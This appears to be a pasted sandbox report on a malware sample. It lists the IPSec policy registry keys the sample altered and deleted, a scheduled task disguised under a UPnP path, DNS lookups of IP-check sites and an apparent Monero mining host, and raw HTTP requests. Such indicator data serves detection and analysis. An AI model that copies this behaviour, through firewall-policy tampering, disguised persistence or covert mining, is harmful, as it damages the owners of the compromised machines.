- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy4a4b7620-b7f3-40ec-a67c-6871e223e76e\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy4a4b7620-b7f3-40ec-a67c-6871e223e76e\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy4a4b7620-b7f3-40ec-a67c-6871e223e76e\\ipsecNegotiationPolicyAction",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy4a4b7620-b7f3-40ec-a67c-6871e223e76e\\ipsecNegotiationPolicyType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy4a4b7620-b7f3-40ec-a67c-6871e223e76e\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy4a4b7620-b7f3-40ec-a67c-6871e223e76e\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy4a4b7620-b7f3-40ec-a67c-6871e223e76e\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy2492efdb-3a28-43a3-a73d-f3a1df184672",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy2492efdb-3a28-43a3-a73d-f3a1df184672\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy2492efdb-3a28-43a3-a73d-f3a1df184672\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy2492efdb-3a28-43a3-a73d-f3a1df184672\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy2492efdb-3a28-43a3-a73d-f3a1df184672\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy2492efdb-3a28-43a3-a73d-f3a1df184672\\ipsecNegotiationPolicyAction",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy2492efdb-3a28-43a3-a73d-f3a1df184672\\ipsecNegotiationPolicyType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy2492efdb-3a28-43a3-a73d-f3a1df184672\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy2492efdb-3a28-43a3-a73d-f3a1df184672\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy2492efdb-3a28-43a3-a73d-f3a1df184672\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAc9e04e96-c4d4-4b40-ba8e-14fcbeefa896",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAc9e04e96-c4d4-4b40-ba8e-14fcbeefa896\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAc9e04e96-c4d4-4b40-ba8e-14fcbeefa896\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAc9e04e96-c4d4-4b40-ba8e-14fcbeefa896\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAc9e04e96-c4d4-4b40-ba8e-14fcbeefa896\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAc9e04e96-c4d4-4b40-ba8e-14fcbeefa896\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAc9e04e96-c4d4-4b40-ba8e-14fcbeefa896\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAc9e04e96-c4d4-4b40-ba8e-14fcbeefa896\\ipsecNegotiationPolicyReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAc9e04e96-c4d4-4b40-ba8e-14fcbeefa896\\ipsecFilterReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAc9e04e96-c4d4-4b40-ba8e-14fcbeefa896\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAc9e04e96-c4d4-4b40-ba8e-14fcbeefa896\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter39c41793-09b5-4213-9837-a9743fda0308\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy4a4b7620-b7f3-40ec-a67c-6871e223e76e\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ActivePolicy",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\IPSec",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPSec\\OperationMode",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\EA94A92D-DCDF-4319-BB83-8D185C32A65E\\Path",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\EA94A92D-DCDF-4319-BB83-8D185C32A65E\\Hash",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\UPnP\\Services\\Id",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\UPnP\\Services\\Index",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\EA94A92D-DCDF-4319-BB83-8D185C32A65E\\Triggers",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\EA94A92D-DCDF-4319-BB83-8D185C32A65E\\DynamicInfo"
- * Deleted Registry Keys:
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy770b2190-07bf-4556-92cb-b0e7531fbfb2\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicyd1c155cc-4661-45df-8768-9230678eb6f5\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA8337379d-ab13-4a4d-a5bd-15691ebc083b\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter39c41793-09b5-4213-9837-a9743fda0308\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter2b2325bc-76e7-4029-af3c-319adec8c06e\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy4a4b7620-b7f3-40ec-a67c-6871e223e76e\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy2492efdb-3a28-43a3-a73d-f3a1df184672\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFAc9e04e96-c4d4-4b40-ba8e-14fcbeefa896\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy2b2b6b17-733c-4aa3-94b1-b7a4fb3b2532\\ipsecOwnersReference"
- * DNS Communications:
- "type": "A",
- "request": "ip.3322.net",
- "answers":
- "data": "dyndns.s.3322.net",
- "type": "CNAME"
- "data": "118.184.176.22",
- "type": "A"
- "type": "A",
- "request": "www.ip138.com",
- "answers":
- "data": "www.ip138.com.lxdns.com",
- "type": "CNAME"
- "data": "157.185.144.122",
- "type": "A"
- "type": "A",
- "request": "monero.monerov9.com",
- "answers":
- "data": "61.216.5.103",
- "type": "A"
- * Domains:
- "ip": "61.216.5.103",
- "domain": "monero.monerov9.com"
- "ip": "",
- "domain": "ip.3322.net"
- "ip": "",
- "domain": "www.ip138.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://www.ip138.com/ips138.asp?ip=",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
- "method": "GET",
- "host": "www.ip138.com",
- "version": "1.1",
- "path": "/ips138.asp?ip=",
- "data": "GET /ips138.asp?ip= HTTP/1.1\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\nReferer: http://www.ip138.com/ips138.asp?ip=\r\nAccept-Language: zh-cn\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\nHost: www.ip138.com\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://www.ip138.com/",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
- "method": "GET",
- "host": "www.ip138.com",
- "version": "1.1",
- "path": "/",
- "data": "GET / HTTP/1.1\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\nReferer: http://www.ip138.com/ips138.asp?ip=\r\nAccept-Language: zh-cn\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\nHost: www.ip138.com\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nCookie: ASPSESSIONIDSCDDSQSS=OKDKKOIBHMGFHBBMEJHDAKEN\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment